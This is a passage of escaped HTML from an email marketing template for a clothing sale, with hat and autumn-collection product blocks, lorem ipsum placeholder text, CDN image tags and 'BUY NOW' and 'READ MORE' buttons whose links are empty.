0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-51p5\\\" style=\\\"max-width: 320px;min-width: 309px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603387097160-161951\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 289px;\\\" width=\\\"289\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_18\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HATS<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_19\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>A CAP<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_20\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">$220<\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">$120<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_6\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:46px; v-text-anchor:middle; width:115px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">BUY NOW<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #ef0d33\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #ef0d33;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 20px; line-height: 28px;\\\">WHERE DOES IT COME FROM?<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ecf0f1; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Lorem Ipsum is simply dummy text of the printing and typesetting industry.<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 160%;\\\">Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. <\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_5\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:56px; v-text-anchor:middle; width:210px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:20px 30px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">MORE SPECIAL OFFERS<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-49p83\\\" style=\\\"max-width: 320px;min-width: 298.98px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_15\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px 0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>AUTMN COLLECTION<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_16\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\"><strong>CASUAL STYLE<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #0e0f13; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. here are many variations of passages.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_9\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 14px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:36px; v-text-anchor:middle; width:119px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">READ MORE<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"301\\\" style=\\\"width: 301px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50p17\\\" style=\\\"max-width: 320px;min-width: 301.02px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603387726674-18031\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 301.02px;\\\" width=\\\"301.02\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" 